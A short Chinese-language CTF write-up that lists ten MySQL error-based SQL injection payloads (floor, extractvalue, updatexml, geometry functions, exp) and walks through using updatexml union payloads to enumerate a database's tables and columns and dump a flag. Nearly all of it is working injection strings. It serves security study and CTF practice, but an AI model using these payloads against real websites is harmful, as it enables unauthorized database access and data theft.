报错注入
注入过程中经常根据错误回显进行判断,但是现在非常多的Web程序没有正常的错误回显,这样就需要利用报错注入的方式来进行SQL注入了
十种MySql报错注入
1.floor()
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
2.extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5.multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6.polygon()
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
7.multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
8.linestring()
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
9.multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
10.exp()
select * from test where id=1 and exp(~(select * from(select user())a));
平时我们最常用到的三种报错注入方式分别是:floor()、updatexml()、extractvalue()。
考点
sql报错注入
分析过程
查询当前使用的数据库
-1 union select updatexml(1, concat(0x7e, database(),0x7e),1)
查询数据库表名
-1 union select updatexml(1, concat(0x7e,( select( group_concat( table_name))from information_schema.tables where table_schema=“sqli”),0x7e),1)
获取表的字段名
-1 union select updatexml(1, concat(0x7e,( select( group_concat(column_name))from information_schema.columns where table_schema=‘sqli’ and table_name=‘flag’),0x7e),1)
获取指定数据库的表的列的内容
select*from news where id=-1 union select updatexml(1, concat(0x7e,(select( group_concat(flag)) from sqli.flag), 0x7e),1)
得到flag